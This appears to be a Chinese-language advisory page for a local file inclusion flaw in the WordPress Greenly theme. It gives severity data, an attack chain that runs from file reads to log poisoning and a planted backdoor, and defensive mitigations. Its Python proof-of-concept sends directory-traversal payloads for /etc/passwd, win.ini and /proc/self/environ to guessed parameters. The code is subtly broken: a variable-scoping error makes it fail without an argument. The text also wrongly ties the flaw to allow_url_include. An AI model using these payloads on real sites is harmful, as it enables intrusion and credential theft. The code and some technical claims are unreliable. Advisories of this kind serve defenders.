CVE-2026-32392 WordPress Greenly主题本地文件包含漏洞

漏洞信息

漏洞编号

CVE-2026-32392

漏洞类型

本地文件包含

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress Greenly主题 (Creatives_Planet Greenly)

漏洞概述

CVE-2026-32392是WordPress Greenly主题中的一个高危本地文件包含（LFI）漏洞，CVSS评分达到7.5分。该漏洞由于PHP程序对文件名（include/require语句）的控制不当导致，允许攻击者通过构造恶意请求包含服务器上的本地文件。Greenly主题是一款由Creatives_Planet开发的WordPress主题，广泛应用于各类网站。漏洞影响范围覆盖该主题的8.1及以下所有版本。攻击者无需高权限即可利用此漏洞，在无需用户交互的情况下，可实现机密性、完整性和可用性的高影响。远程攻击者可通过网络发起攻击，成功利用可导致敏感信息泄露、恶意代码执行甚至服务器完全沦陷。此漏洞由[email protected]于2026年3月13日披露。

技术细节

该漏洞属于PHP文件包含类漏洞，具体表现为本地文件包含（LFI）。在Greenly主题的PHP代码中，存在对用户输入参数（如file、page、template等常见参数名）未进行充分验证和过滤就直接用于include()或require()语句的情况。攻击者可以通过目录遍历字符（如../）结合已知文件路径，尝试包含服务器上的敏感文件，例如：1) 包含/etc/passwd获取系统用户信息；2) 包含Web日志文件实现远程代码执行；3) 包含配置文件获取数据库凭证等敏感信息。攻击成功的前提是PHP配置中allow_url_fopen和allow_url_include未完全禁用，且服务器文件系统权限允许PHP进程读取目标文件。攻击者通常利用此漏洞作为初始入侵点，进而可能升级为远程代码执行（RCE）。

攻击链分析

STEP 1

步骤1

信息收集：攻击者识别目标网站使用的WordPress CMS，并确定是否安装Greenly主题及其版本（<=8.1）

STEP 2

步骤2

漏洞探测：攻击者通过测试常见参数（file、page、template等）结合目录遍历payload（如../../etc/passwd）确认LFI漏洞存在

STEP 3

步骤3

敏感文件读取：利用LFI漏洞读取服务器敏感文件，如/etc/passwd、PHP配置文件（wp-config.php）、数据库配置等

STEP 4

步骤4

权限提升与RCE：包含日志文件（如Apache access log）或上传图片附加PHP代码，实现远程代码执行

STEP 5

步骤5

持久化控制：植入后门程序，建立持久化访问通道，完全控制服务器

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2026-32392 PoC - WordPress Greenly Theme Local File Inclusion
# Target: WordPress site using Greenly theme <= 8.1
# Author: Security Researcher

import requests
import sys

TARGET_URL = "http://target-site.com"
# Common vulnerable parameter names in WordPress themes
VULN_PARAMS = ["file", "page", "template", "theme", "style", "script"]
# Files to test for LFI
TEST_FILES = [
    "../../../../../../etc/passwd",
    "../../../../../../windows/win.ini",
    "../../../../../../proc/self/environ"
]

def test_lfi(url, param, filename):
    """Test for Local File Inclusion vulnerability"""
    full_url = f"{url}/?{param}={filename}"
    try:
        response = requests.get(full_url, timeout=10)
        # Check for file content signatures
        if "root:" in response.text or ":/bin/" in response.text:
            print(f"[+] VULNERABLE! Found /etc/passwd via parameter: {param}")
            print(f"[+] URL: {full_url}")
            return True
        elif "[extensions]" in response.text:
            print(f"[+] VULNERABLE! Found win.ini via parameter: {param}")
            return True
        elif "DOCUMENT_ROOT" in response.text or "HTTP_USER_AGENT" in response.text:
            print(f"[+] VULNERABLE! Found proc/self/environ via parameter: {param}")
            return True
    except Exception as e:
        print(f"[-] Error testing {full_url}: {e}")
    return False

def main():
    if len(sys.argv) > 1:
        TARGET_URL = sys.argv[1]
    
    print(f"[*] Testing CVE-2026-32392 - Greenly Theme LFI")
    print(f"[*] Target: {TARGET_URL}")
    
    for param in VULN_PARAMS:
        for test_file in TEST_FILES:
            if test_lfi(TARGET_URL, param, test_file):
                print(f"[!] Exploit: {TARGET_URL}/?{param}={test_file}")
                exit(0)
    
    print("[-] No LFI vulnerability detected with basic tests")

if __name__ == "__main__":
    main()

影响范围

WordPress Greenly主题 <= 8.1

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：1) 限制Greenly主题相关URL参数的输入，使用正则表达式严格验证文件名格式；2) 在Web服务器配置中添加规则拦截包含../的请求；3) 禁用PHP的allow_url_fopen和allow_url_include配置；4) 设置open_basedir限制PHP进程只能访问特定目录；5) 临时切换到其他经过安全审计的WordPress主题；6) 部署WAF规则检测和阻止LFI攻击特征。